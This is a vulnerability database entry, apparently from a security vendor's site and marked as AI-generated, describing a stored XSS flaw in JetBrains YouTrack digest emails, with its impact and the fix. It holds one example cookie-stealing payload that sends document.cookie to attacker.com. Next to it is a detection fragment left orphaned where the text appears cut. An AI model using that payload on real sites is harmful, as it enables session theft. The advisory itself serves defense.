
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-61492 is a stored Cross-Site Scripting (XSS) vulnerability in JetBrains YouTrack that allows injection of malicious JavaScript via article titles included in digest emails. All YouTrack versions before 2026.2.17394 are affected. The vulnerability was published on July 10, 2026, with a patch available in version 2026.2.17394. It carries a CVSS v3.1 base score of 6.1 (Medium) per NVD, though the GitHub Advisory Database rates it as Low (3.5) using a slightly different scoring vector (GitHub Advisory, JetBrains).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). An authenticated user with low privileges can craft a malicious article title containing JavaScript payloads that are not properly sanitized before being rendered in digest email content. When recipients open the digest email in a browser-based email client or web interface, the injected script executes in their browser context. The attack vector is network-based, requires low privileges to inject the payload, and requires user interaction (opening the email) to trigger execution (GitHub Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who views a digest email containing the malicious article title. This can result in session token theft, credential harvesting, unauthorized actions performed on behalf of the victim within YouTrack, and limited data exposure. Confidentiality and integrity are both partially impacted, while availability is unaffected (GitHub Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent XSS string.<script>, onerror=, javascript:).JetBrains has released a fix in YouTrack version 2026.2.17394. Administrators should upgrade to this version or later as the primary remediation. As a temporary workaround, consider disabling digest email functionality or restricting article creation permissions to trusted users only until the patch can be applied. Additionally, enforcing Content Security Policy (CSP) headers in email clients and webmail interfaces can reduce the risk of XSS execution (JetBrains, GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."